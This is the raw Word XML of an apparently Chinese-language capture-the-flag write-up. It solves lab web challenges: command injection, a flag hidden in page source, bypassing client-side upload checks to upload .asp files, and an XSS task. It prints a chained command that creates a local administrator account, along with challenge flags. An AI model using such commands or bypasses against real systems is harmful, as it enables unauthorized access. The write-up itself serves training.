      </w:r>
      <w:proofErr w:type="spellStart"/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t>cmd</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/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t>相关命令的使用。</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="005C497D" w:rsidRPr="005C497D" w:rsidRDefault="005C497D" w:rsidP="005C497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C49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5C49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5C49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5C497D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&lt;http://10.10.23.105/8/&gt;</w:t>
      </w:r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5C49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5C49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) </w:t>
      </w:r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5C497D" w:rsidRPr="005C497D" w:rsidRDefault="005C497D" w:rsidP="005C497D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698337" cy="2763057"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:docPr id="13" name="图片 13" descr="http://192.168.109.235/storage/images/201812051028148r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192.168.109.235/storage/images/201812051028148rr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158" cy="2770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97D" w:rsidRPr="008E7DF0" w:rsidRDefault="005C497D" w:rsidP="005C497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FF0000"/>
          <w:kern w:val="0"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="005C49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5C49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5C49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t>由提示可以知道，我们需要添加一个管理员用户。输入添加用户和提升为管理员的命令</w:t>
      </w:r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8E7DF0">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="微软雅黑" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="FF0000"/>
          <w:kern w:val="0"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">net user </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="008E7DF0">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="微软雅黑" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="FF0000"/>
          <w:kern w:val="0"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>hongyaa</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="008E7DF0">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="微软雅黑" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="FF0000"/>
          <w:kern w:val="0"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve"> 123456 /add &amp; net </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="008E7DF0">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="微软雅黑" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="FF0000"/>
          <w:kern w:val="0"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>localgroup</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="008E7DF0">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="微软雅黑" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="FF0000"/>
          <w:kern w:val="0"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve"> administrators </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="008E7DF0">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="微软雅黑" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="FF0000"/>
          <w:kern w:val="0"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>hongyaa</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="008E7DF0">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="微软雅黑" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="FF0000"/>
          <w:kern w:val="0"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve"> /add</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="005C497D" w:rsidRPr="005C497D" w:rsidRDefault="005C497D" w:rsidP="005C497D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123260" cy="2855530"/>
            <wp:effectExtent l="0" t="0" r="0" b="2540"/>
            <wp:docPr id="12" name="图片 12" descr="http://192.168.109.235/storage/images/20181207135033RX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192.168.109.235/storage/images/20181207135033RXi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536" cy="2886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97D" w:rsidRPr="005C497D" w:rsidRDefault="005C497D" w:rsidP="005C497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C49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5C49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5C49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t>点击向菜刀大牛验证并领取</w:t>
      </w:r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t>，获得</w:t>
      </w:r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t>值</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="005C497D" w:rsidRPr="005C497D" w:rsidRDefault="005C497D" w:rsidP="005C497D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332874" cy="1562262"/>
            <wp:effectExtent l="0" t="0" r="1270" b="0"/>
            <wp:docPr id="11" name="图片 11" descr="http://192.168.109.235/storage/images/20181207135052X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192.168.109.235/storage/images/20181207135052XN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675" cy="1572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97D" w:rsidRPr="005C497D" w:rsidRDefault="005C497D" w:rsidP="005C497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C49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5C49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5C49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t>点击提交，检验账号，返回</w:t>
      </w:r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5C497D">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="微软雅黑" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="24292E"/>
          <w:kern w:val="0"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>值</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="005C497D" w:rsidRDefault="005C497D" w:rsidP="005C497D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274820" cy="1357815"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:docPr id="10" name="图片 10" descr="http://192.168.109.235/storage/images/20181205102832lq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192.168.109.235/storage/images/20181205102832lqW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611" cy="138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DF0" w:rsidRDefault="008E7DF0" w:rsidP="008E7DF0">
      <w:pPr>
        <w:pStyle w:val="2"/>
      </w:pPr>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="008E7DF0">
        <w:rPr>
          <w:highlight w:val="yellow"/>
        </w:rPr>
        <w:t>Windows_CMD_is_useful</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="008E7DF0">
        <w:rPr>
          <w:highlight w:val="yellow"/>
        </w:rPr>
        <w:t>!</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="008E7DF0" w:rsidRPr="008E7DF0" w:rsidRDefault="008E7DF0" w:rsidP="008E7DF0"/>
    <w:p w:rsidR="001D1A80" w:rsidRDefault="001D1A80" w:rsidP="003D30B4">
      <w:pPr>
        <w:pStyle w:val="1"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t>老规矩，你懂的</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="002C4800" w:rsidRPr="002C4800" w:rsidRDefault="002C4800" w:rsidP="002C4800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2C4800" w:rsidRPr="002C4800" w:rsidRDefault="002C4800" w:rsidP="002C4800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C4800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2C4800" w:rsidRPr="002C4800" w:rsidRDefault="002C4800" w:rsidP="002C480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C4800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2C4800" w:rsidRPr="002C4800" w:rsidRDefault="002C4800" w:rsidP="002C4800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C4800">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="宋体" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="666666"/>
          <w:kern w:val="0"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>简单的</w:t>
      </w:r>
      <w:r w:rsidRPr="002C4800">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="宋体" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="666666"/>
          <w:kern w:val="0"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>web</w:t>
      </w:r>
      <w:r w:rsidRPr="002C4800">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="宋体" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="666666"/>
          <w:kern w:val="0"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>代码隐藏</w:t>
      </w:r>
      <w:r w:rsidRPr="002C4800">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="宋体" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="666666"/>
          <w:kern w:val="0"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>key</w:t>
      </w:r>
      <w:r w:rsidRPr="002C4800">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="宋体" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="666666"/>
          <w:kern w:val="0"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>的题目。</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="002C4800" w:rsidRPr="002C4800" w:rsidRDefault="002C4800" w:rsidP="002C480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C4800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2C4800" w:rsidRPr="002C4800" w:rsidRDefault="002C4800" w:rsidP="002C4800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C4800">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="宋体" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="666666"/>
          <w:kern w:val="0"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>信息隐藏</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="002C4800" w:rsidRPr="002C4800" w:rsidRDefault="002C4800" w:rsidP="002C480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C4800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2C4800" w:rsidRPr="002C4800" w:rsidRDefault="002C4800" w:rsidP="002C4800">
      <w:pPr>
        <w:widowControl/>
        <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        <w:spacing w:beforeAutospacing="1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C4800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2C4800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2C4800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2C4800">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="微软雅黑" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="24292E"/>
          <w:kern w:val="0"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>/14,</w:t>
      </w:r>
      <w:r w:rsidRPr="002C4800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2C4800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2C4800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2C4800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2C4800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2C4800">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="微软雅黑" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="24292E"/>
          <w:kern w:val="0"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>通过源码获取</w:t>
      </w:r>
      <w:r w:rsidRPr="002C4800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2C4800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2C4800" w:rsidRPr="002C4800" w:rsidRDefault="002C4800" w:rsidP="002C4800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C4800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2C4800" w:rsidRPr="002C4800" w:rsidRDefault="002C4800" w:rsidP="002C4800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C4800">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="微软雅黑" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="24292E"/>
          <w:kern w:val="0"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>﻿</w:t>
      </w:r>
      <w:r w:rsidRPr="002C480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C480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2C480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C4800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2C4800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&lt;http://10.10.23.105/14/&gt;</w:t>
      </w:r>
      <w:r w:rsidRPr="002C4800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2C480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2C480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2C4800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) </w:t>
      </w:r>
      <w:r w:rsidRPr="002C4800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2C4800" w:rsidRPr="002C4800" w:rsidRDefault="002C4800" w:rsidP="002C4800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102817" cy="1527695"/>
            <wp:effectExtent l="0" t="0" r="3175" b="0"/>
            <wp:docPr id="15" name="图片 15" descr="http://192.168.109.235/storage/images/20181205104047O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192.168.109.235/storage/images/20181205104047OB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333" cy="1533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800" w:rsidRPr="002C4800" w:rsidRDefault="002C4800" w:rsidP="002C4800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C480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C480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2C480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C4800">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="微软雅黑" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="24292E"/>
          <w:kern w:val="0"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>右键查看源代码，</w:t>
      </w:r>
      <w:r w:rsidRPr="002C4800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2C4800">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="微软雅黑" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="24292E"/>
          <w:kern w:val="0"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>就静静的躺在那里</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="002C4800" w:rsidRDefault="002C4800" w:rsidP="002C4800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375728" cy="2346241"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:docPr id="14" name="图片 14" descr="http://192.168.109.235/storage/images/20181205104058eZ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192.168.109.235/storage/images/20181205104058eZF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040" cy="235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DF0" w:rsidRPr="002C4800" w:rsidRDefault="008E7DF0" w:rsidP="008E7DF0">
      <w:pPr>
        <w:pStyle w:val="2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DF0">
        <w:rPr>
          <w:highlight w:val="yellow"/>
        </w:rPr>
        <w:t>WeLc0m3_T0_F1nal_C0mpEtiTi0n</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00FE45F2" w:rsidRDefault="001D1A80" w:rsidP="00FE45F2">
      <w:pPr>
        <w:pStyle w:val="1"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>文件上传</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00FE45F2" w:rsidRPr="00FE45F2" w:rsidRDefault="00FE45F2" w:rsidP="00FE45F2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FE45F2" w:rsidRPr="00FE45F2" w:rsidRDefault="00FE45F2" w:rsidP="00FE45F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FE45F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FE45F2" w:rsidRPr="00FE45F2" w:rsidRDefault="00FE45F2" w:rsidP="00FE45F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E45F2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FE45F2" w:rsidRPr="00FE45F2" w:rsidRDefault="00FE45F2" w:rsidP="00FE45F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FE45F2">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="宋体" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="666666"/>
          <w:kern w:val="0"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>web</w:t>
      </w:r>
      <w:r w:rsidRPr="00FE45F2">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="宋体" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="666666"/>
          <w:kern w:val="0"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>代码修改上传验证</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00FE45F2" w:rsidRPr="00FE45F2" w:rsidRDefault="00FE45F2" w:rsidP="00FE45F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E45F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FE45F2" w:rsidRPr="00FE45F2" w:rsidRDefault="00FE45F2" w:rsidP="00FE45F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FE45F2">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="宋体" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="666666"/>
          <w:kern w:val="0"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>文件上传</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00FE45F2" w:rsidRPr="00FE45F2" w:rsidRDefault="00FE45F2" w:rsidP="00FE45F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E45F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FE45F2" w:rsidRPr="00FE45F2" w:rsidRDefault="00FE45F2" w:rsidP="00FE45F2">
      <w:pPr>
        <w:widowControl/>
        <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        <w:spacing w:beforeAutospacing="1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/17,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firebug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修改验证代码，且支持上传条件，获取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FE45F2" w:rsidRPr="00FE45F2" w:rsidRDefault="00FE45F2" w:rsidP="00FE45F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FE45F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FE45F2" w:rsidRPr="00FE45F2" w:rsidRDefault="00FE45F2" w:rsidP="00FE45F2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进入题目页面，发现本题再次是一个文件上传相关方面的题目。</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00FE45F2" w:rsidRPr="00FE45F2" w:rsidRDefault="00FE45F2" w:rsidP="00FE45F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简单测试后可以发现，这里只是一个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JS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验证而已。用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Firefox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的插件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firebug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，将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head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中脚本的</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/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case"jpg":case"gif</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/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":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中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jpg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、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gif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任意一个修改为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asp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，然后随便传一个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asp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后缀的文件，即可得到本题的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FE45F2" w:rsidRPr="00FE45F2" w:rsidRDefault="00FE45F2" w:rsidP="00FE45F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E45F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lastRenderedPageBreak/>
        <w:t>步骤</w:t>
      </w:r>
      <w:r w:rsidRPr="00FE45F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FE45F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打开火狐浏览器输入网址</w:t>
      </w:r>
      <w:r w:rsidRPr="00FE45F2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&lt;http://10.10.23.105/17/&gt;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FE45F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FE45F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) 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FE45F2" w:rsidRPr="00FE45F2" w:rsidRDefault="00FE45F2" w:rsidP="00FE45F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050155" cy="2692896"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:docPr id="21" name="图片 21" descr="http://192.168.109.235/storage/images/20181205105441a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192.168.109.235/storage/images/20181205105441aCS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119" cy="27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5F2" w:rsidRPr="00FE45F2" w:rsidRDefault="00FE45F2" w:rsidP="00FE45F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E45F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E45F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FE45F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这里面需要用到火狐的插件，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firebug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，如果没有请下载</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00FE45F2" w:rsidRPr="00FE45F2" w:rsidRDefault="00FE45F2" w:rsidP="00FE45F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834467" cy="430191"/>
            <wp:effectExtent l="0" t="0" r="0" b="8255"/>
            <wp:docPr id="20" name="图片 20" descr="http://192.168.109.235/storage/images/20181205105454qZ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192.168.109.235/storage/images/20181205105454qZy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813" cy="44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5F2" w:rsidRPr="00FE45F2" w:rsidRDefault="00FE45F2" w:rsidP="00FE45F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E45F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E45F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FE45F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按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F12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运行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firebug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，找到加载脚本的地方，发现这个代码段</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00FE45F2" w:rsidRPr="00FE45F2" w:rsidRDefault="00FE45F2" w:rsidP="00FE45F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FE45F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&lt;script&gt;function</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00FE45F2" w:rsidRPr="00FE45F2" w:rsidRDefault="00FE45F2" w:rsidP="00FE45F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FE45F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check(){switch(document.getElementById("file1").value.substring(document.getElementById("file1").value.lastIndexOf('.')+1,document.getElementById("file1").length)){case"jpg":case"gif":return</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00FE45F2" w:rsidRPr="00FE45F2" w:rsidRDefault="00FE45F2" w:rsidP="00FE45F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spellStart"/>
      <w:r w:rsidRPr="00FE45F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true;break;default:alert</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00FE45F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("</w:t>
      </w:r>
      <w:r w:rsidRPr="00FE45F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文件格式不支持！</w:t>
      </w:r>
      <w:r w:rsidRPr="00FE45F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");return false}}&lt;/script&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00FE45F2" w:rsidRPr="00FE45F2" w:rsidRDefault="00FE45F2" w:rsidP="00FE45F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38990" cy="2071370"/>
            <wp:effectExtent l="0" t="0" r="0" b="5080"/>
            <wp:docPr id="19" name="图片 19" descr="http://192.168.109.235/storage/images/20181205105504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192.168.109.235/storage/images/2018120510550420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061" cy="209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5F2" w:rsidRPr="00FE45F2" w:rsidRDefault="00FE45F2" w:rsidP="00FE45F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E45F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lastRenderedPageBreak/>
        <w:t>步骤</w:t>
      </w:r>
      <w:r w:rsidRPr="00FE45F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FE45F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在用户端做了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JS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验证，上传类型要是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jpg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gif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的，这时我们可以直接修改，选中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script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，点击编辑</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00FE45F2" w:rsidRPr="00FE45F2" w:rsidRDefault="00FE45F2" w:rsidP="00FE45F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151052" cy="1411249"/>
            <wp:effectExtent l="0" t="0" r="2540" b="0"/>
            <wp:docPr id="18" name="图片 18" descr="http://192.168.109.235/storage/images/201812051055121J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192.168.109.235/storage/images/201812051055121JY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134" cy="1426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5F2" w:rsidRPr="00FE45F2" w:rsidRDefault="00FE45F2" w:rsidP="00FE45F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E45F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E45F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FE45F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修改之后，选择任意一个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asp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文件上传</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00FE45F2" w:rsidRPr="00FE45F2" w:rsidRDefault="00FE45F2" w:rsidP="00FE45F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562600" cy="2085975"/>
            <wp:effectExtent l="0" t="0" r="0" b="9525"/>
            <wp:docPr id="17" name="图片 17" descr="http://192.168.109.235/storage/images/20181205105521g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192.168.109.235/storage/images/20181205105521gAp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5F2" w:rsidRPr="00FE45F2" w:rsidRDefault="00FE45F2" w:rsidP="00FE45F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E45F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E45F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6</w:t>
      </w:r>
      <w:r w:rsidRPr="00FE45F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点击上传直接跳转到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FE45F2">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="微软雅黑" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="24292E"/>
          <w:kern w:val="0"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>的页面</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00775A2A" w:rsidRDefault="00FE45F2" w:rsidP="00775A2A">
      <w:pPr>
        <w:widowControl/>
        <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        <w:spacing w:after="100" w:afterAutospacing="1" w:line="480" w:lineRule="atLeast"/>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:highlight w:val="yellow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3962400" cy="1917494"/>
            <wp:effectExtent l="0" t="0" r="0" b="6985"/>
            <wp:docPr id="16" name="图片 16" descr="http://192.168.109.235/storage/images/20181205105530sp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192.168.109.235/storage/images/20181205105530spQ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79" cy="194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A2A" w:rsidRPr="00775A2A" w:rsidRDefault="00775A2A" w:rsidP="00B37AE3">
      <w:pPr>
        <w:pStyle w:val="2"/>
      </w:pPr>
      <w:r w:rsidRPr="00775A2A">
        <w:rPr>
          <w:highlight w:val="yellow"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t>@#w34k_uPl04d_Ch3cK</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="001D1A80" w:rsidRDefault="001D1A80" w:rsidP="003D30B4">
      <w:pPr>
        <w:pStyle w:val="1"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>CSS or XSS</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="003F23C6" w:rsidRPr="003F23C6" w:rsidRDefault="003F23C6" w:rsidP="003F23C6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3F23C6" w:rsidRPr="003F23C6" w:rsidRDefault="003F23C6" w:rsidP="003F23C6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F23C6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3F23C6" w:rsidRPr="003F23C6" w:rsidRDefault="003F23C6" w:rsidP="003F23C6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F23C6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3F23C6" w:rsidRPr="003F23C6" w:rsidRDefault="003F23C6" w:rsidP="003F23C6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3F23C6">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="宋体" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="666666"/>
          <w:kern w:val="0"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>源代码查看</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="003F23C6">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="宋体" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="666666"/>
          <w:kern w:val="0"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>xss</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="003F23C6">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="宋体" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="666666"/>
          <w:kern w:val="0"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>文件内容解析</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="003F23C6" w:rsidRPr="003F23C6" w:rsidRDefault="003F23C6" w:rsidP="003F23C6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F23C6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3F23C6" w:rsidRPr="003F23C6" w:rsidRDefault="003F23C6" w:rsidP="003F23C6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proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="003F23C6">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="宋体" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="666666"/>
          <w:kern w:val="0"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>xss</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="003F23C6">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="宋体" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="666666"/>
          <w:kern w:val="0"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>跨站脚本</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="003F23C6" w:rsidRPr="003F23C6" w:rsidRDefault="003F23C6" w:rsidP="003F23C6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F23C6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3F23C6" w:rsidRPr="003F23C6" w:rsidRDefault="003F23C6" w:rsidP="003F23C6">
      <w:pPr>
        <w:widowControl/>
        <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        <w:spacing w:beforeAutospacing="1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F23C6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3F23C6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3F23C6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3F23C6">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="微软雅黑" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="24292E"/>
          <w:kern w:val="0"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>/19,</w:t>
      </w:r>
      <w:r w:rsidRPr="003F23C6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3F23C6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3F23C6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3F23C6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3F23C6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3F23C6">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="微软雅黑" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="24292E"/>
          <w:kern w:val="0"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>通过</w:t>
      </w:r>
      <w:r w:rsidRPr="003F23C6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3F23C6">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="微软雅黑" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="24292E"/>
          <w:kern w:val="0"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>网站源码中文件内容解析获取</w:t>
      </w:r>
      <w:r w:rsidRPr="003F23C6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3F23C6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3F23C6" w:rsidRPr="003F23C6" w:rsidRDefault="003F23C6" w:rsidP="003F23C6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F23C6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3F23C6" w:rsidRPr="003F23C6" w:rsidRDefault="003F23C6" w:rsidP="003F23C6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F23C6">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="微软雅黑" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="24292E"/>
          <w:kern w:val="0"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>源代码查看</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="003F23C6">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="微软雅黑" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="24292E"/>
          <w:kern w:val="0"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>xss</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="003F23C6">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="微软雅黑" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="24292E"/>
          <w:kern w:val="0"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>文件</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="003F23C6" w:rsidRPr="003F23C6" w:rsidRDefault="003F23C6" w:rsidP="003F23C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F23C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F23C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3F23C6">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="微软雅黑" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="24292E"/>
          <w:kern w:val="0"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>：打开火狐浏览器输入网址</w:t>
      </w:r>
      <w:r w:rsidRPr="003F23C6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&lt;http://10.10.23.105/19/&gt;</w:t>
      </w:r>
      <w:r w:rsidRPr="003F23C6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3F23C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3F23C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3F23C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) </w:t>
      </w:r>
      <w:r w:rsidRPr="003F23C6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3F23C6" w:rsidRPr="003F23C6" w:rsidRDefault="003F23C6" w:rsidP="003F23C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57928" cy="2529130"/>
            <wp:effectExtent l="0" t="0" r="0" b="5080"/>
            <wp:docPr id="24" name="图片 24" descr="http://192.168.109.235/storage/images/20181205110014Yy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192.168.109.235/storage/images/20181205110014YyV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657" cy="254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3C6" w:rsidRPr="003F23C6" w:rsidRDefault="003F23C6" w:rsidP="003F23C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F23C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lastRenderedPageBreak/>
        <w:t>步骤</w:t>
      </w:r>
      <w:r w:rsidRPr="003F23C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3F23C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F23C6">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="微软雅黑" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="24292E"/>
          <w:kern w:val="0"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>右键查看源代码，发现有一个</w:t>
      </w:r>
      <w:r w:rsidRPr="003F23C6">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="微软雅黑" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="24292E"/>
          <w:kern w:val="0"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>default.css</w:t>
      </w:r>
      <w:r w:rsidRPr="003F23C6">
